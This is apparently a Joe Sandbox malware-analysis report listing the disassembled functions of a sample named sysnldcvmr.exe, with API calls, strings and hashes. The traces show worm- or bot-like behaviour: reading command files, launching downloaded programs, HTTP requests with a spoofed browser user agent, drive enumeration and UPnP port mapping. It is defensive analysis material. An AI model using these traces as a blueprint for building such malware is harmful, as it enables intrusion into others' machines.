Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID: C:\Users\user\tbtnds.dat$Vz@$.ou
API String ID: 439099756-3072227601
Opcode ID: 8d7cde204a8a1769cbf9c31fa4a0dcac597e6b6dcc3230a668d142432fe62379
Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
Opcode Fuzzy Hash: 8d7cde204a8a1769cbf9c31fa4a0dcac597e6b6dcc3230a668d142432fe62379
Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D

Function 00405BC0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
CloseHandle.KERNEL32(00000000), ref: 00405CD5
CloseHandle.KERNEL32(000000FF), ref: 00405CDF

Strings

C:\Users\user\tbtcmds.dat, xrefs: 00405BE0
.ou, xrefs: 00405CD5, 00405CDF

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID: C:\Users\user\tbtcmds.dat$.ou
API String ID: 3956458805-2669820434
Opcode ID: 0d31e8e54dd4377960fe8f85c90de5e8a1c48912456c97c5d368e4304b7c840c
Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
Opcode Fuzzy Hash: 0d31e8e54dd4377960fe8f85c90de5e8a1c48912456c97c5d368e4304b7c840c
Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99

Function 0040E980 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040E98E
memset.NTDLL ref: 0040E99E
CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
Sleep.KERNEL32(000003E8), ref: 0040E9E7
ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
Sleep.KERNEL32(000003E8), ref: 0040EA1C

Strings

D, xrefs: 0040E9A6
Gy@, xrefs: 0040E9D1, 0040E9F7, 0040E9D4, 0040E9FA
open, xrefs: 0040E9FB
, xrefs: 0040EA11

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$Gy@$open
API String ID: 3787208655-4184347819
Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59

Function 0040D2D0 Relevance: 16.6, APIs: 11, Instructions: 95
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0040D2D6
GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,009D0638,000000FF), ref: 0040D2DD
GetCurrentThread.KERNEL32 ref: 0040D2E8
SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,009D0638,000000FF), ref: 0040D2EF
InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
Sleep.KERNEL32(00000001), ref: 0040D3DE
GetCurrentThread.KERNEL32 ref: 0040D3ED
SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A

Function 0040AB80 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A

Strings

C:\Users\user\tbtnds.dat, xrefs: 0040AC13
.ou, xrefs: 0040AC4D

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID: C:\Users\user\tbtnds.dat$.ou
API String ID: 442028454-3213903240
Opcode ID: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
Opcode Fuzzy Hash: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59

Function 0040D890 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
Sleep.KERNEL32(000003E8), ref: 0040D8EE
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E

Strings

LOCATION: , xrefs: 0040D915
HTTP/1.1 200 OK, xrefs: 0040D8FF

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C

Function 0040EA30 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
InternetCloseHandle.WININET(00000000), ref: 0040EAB8
InternetCloseHandle.WININET(00000000), ref: 0040EAC2
Sleep.KERNEL32(000003E8), ref: 0040EACD

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 2743515581-2960703779
Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55

Function 00407440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 004074BD
Sleep.KERNEL32(000003E8), ref: 004074EC
wsprintfA.USER32 ref: 00407517
DeleteUrlCacheEntry.WININET(?), ref: 00407527
Sleep.KERNEL32(000DBBA0), ref: 0040756F

Strings

%s%s, xrefs: 0040750B

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A

Function 004063A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004063A6
RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
RegCloseKey.ADVAPI32(?), ref: 0040643E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
NoDrives, xrefs: 00406418

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99

Function 0040D160 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184

Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9

CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
Opcode Fuzzy Hash: 5b264580e174f85d4cce86815f8b38fbca65b529ae4d3d4b8a529887849fd544
Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7

Function 00406FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
SysAllocString.OLEAUT32(C:\Windows\sysnldcvmr.exe), ref: 00406FF3
CoUninitialize.OLE32 ref: 00407018

Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248

SysFreeString.OLEAUT32(00000000), ref: 00407012

Strings

C:\Windows\sysnldcvmr.exe, xrefs: 00406FEE

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID: C:\Windows\sysnldcvmr.exe
API String ID: 459949847-3906355863
Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56

Function 00406320 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384

Strings

\??\, xrefs: 00406378

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99

Function 0040E770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
CloseHandle.KERNEL32(000000FF), ref: 0040E7B2

Strings

.ou, xrefs: 0040E7B2

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID: .ou
API String ID: 1378416451-3683031111
Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
Opcode Fuzzy Hash: c9913038924388fd53f7caad2d83427ef97aeb746a7412440f965ee31c5f62a1
Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA

Function 00407030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0

SysFreeString.OLEAUT32(00000000), ref: 00407248

Strings

Microsoft Corporation, xrefs: 004071B6

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
Opcode Fuzzy Hash: 02533b8cefa12045522b44547180ad822de7a0bc47ea34b05886565fcfb19160
Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66

Function 0040D640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002,?,?,?,00407A25), ref: 0040D64A

Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805

Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65

Strings

UDP, xrefs: 0040D6D8
TCP, xrefs: 0040D6BB

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
